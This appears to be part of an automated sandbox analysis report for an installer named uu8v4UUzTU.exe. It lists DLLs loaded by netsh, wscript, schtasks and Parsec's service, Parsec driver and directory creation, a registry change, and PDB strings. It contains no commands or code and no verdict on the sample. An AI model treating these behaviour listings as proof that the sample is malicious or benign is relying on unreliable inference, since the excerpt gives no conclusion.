Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: apphelp.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: wtsapi32.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: msi.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: sas.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: windows.storage.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: wldp.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: msasn1.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: cryptsp.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: rsaenh.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: cryptbase.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: gpapi.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: cryptnet.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: profapi.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: iphlpapi.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: winnsi.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: winhttp.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: mswsock.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
Source: Parsec.lnk.12.drLNK file: ..\..\..\..\..\..\Program Files\Parsec\parsecd.exe
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpWindow found: window name: TMainFormJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpAutomated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpAutomated click: Install
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpAutomated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmpAutomated click: Next
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeAutomated click: Next >
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\ParsecJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\wscriptsJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\wscripts\firewall-add.vbsJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\wscripts\firewall-remove.vbsJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\wscripts\legacy-cleanup.vbsJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\wscripts\service-install.vbsJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\wscripts\service-kill-parsec.vbsJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\wscripts\service-remove.vbsJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\vusbJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\vusb\parsec-vud.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\vddJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\vdd\parsec-vdd.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\teams.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\parsecd.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\pservice.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\skelJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\skel\parsecd-150-93b.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\skel\appdata.jsonJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\uninstall.exeJump to behavior
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\vusbinstall.bat
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\vusbuninstall.bat
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.cat
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.inf
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.sys
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.cat
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.inf
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.sys
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\uninstall.exe
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\vddinstall.bat
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\vdduninstall.bat
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\driver
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\driver\mm.cat
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\driver\mm.dll
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\driver\mm.inf
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\mm.man
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\uninstall.exe
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ParsecVUD
Source: uu8v4UUzTU.exeStatic file information: File size 50493432 > 1048576
Source: uu8v4UUzTU.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: RdpSaUacHelper.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-H8DB6.tmp.1.dr
Source: Binary string: Windows.ApplicationModel.ConversationalAgent.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cryptdlg.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: TpmTool.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: icuin.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-BUN5H.tmp.1.dr
Source: Binary string: xpsservices.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wups.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ws2help.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: WSClient.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-CEDA5.tmp.1.dr
Source: Binary string: ws2help.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wlanext.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: SystemEventsBrokerClient.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: RdpSaUacHelper.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-H8DB6.tmp.1.dr
Source: Binary string: SocialApis.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: SyncInfrastructurePS.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: NetworkHelper.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-4HGOQ.tmp.1.dr
Source: Binary string: D:\gitsrc\parsec-cloud\magic-mirror\driver\x64\Release\mm.pdb source: nefconw.exe, 0000004A.00000003.2108779412.0000026240A6A000.00000004.00000020.00020000.00000000.sdmp, SETFD68.tmp.74.dr
Source: Binary string: verifier.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: MFWMAAEC.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c\parsec-cloud\usb-ip\parsecvirtualds\src\x64\Release\parsecvirtualds.pdb source: nefconw.exe, 00000039.00000002.2090721984.000001F9FBA9F000.00000004.00000020.00020000.00000000.sdmp, nefconw.exe, 00000039.00000003.2066450318.000001F9FBAAE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dskquoui.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: sscore.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: netlogon.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: SocialApis.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: NetworkHelper.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-4HGOQ.tmp.1.dr
Source: Binary string: icuin.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-BUN5H.tmp.1.dr
Source: Binary string: MCRecvSrc.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-HA8AR.tmp.1.dr
Source: Binary string: SyncInfrastructurePS.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: MCRecvSrc.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-HA8AR.tmp.1.dr
Source: Binary string: WSClient.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-CEDA5.tmp.1.dr
Source: Binary string: wiashext.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: lockappbroker.pdbUGP source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wkbda3.pdb source: uu8v4UUzTU.tmp, 00000001.00000002.2152942703.000000000018D000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: MFWMAAEC.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Windows.ApplicationModel.ConversationalAgent.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: TrustedSignalCredProv.pdbGCTL source: is-NRIH7.tmp.1.dr
Source: Binary string: wkbdibm02.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wkbdarmty.pdb source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dskquoui.pdbGCTL source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wups.pdbUGP source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp
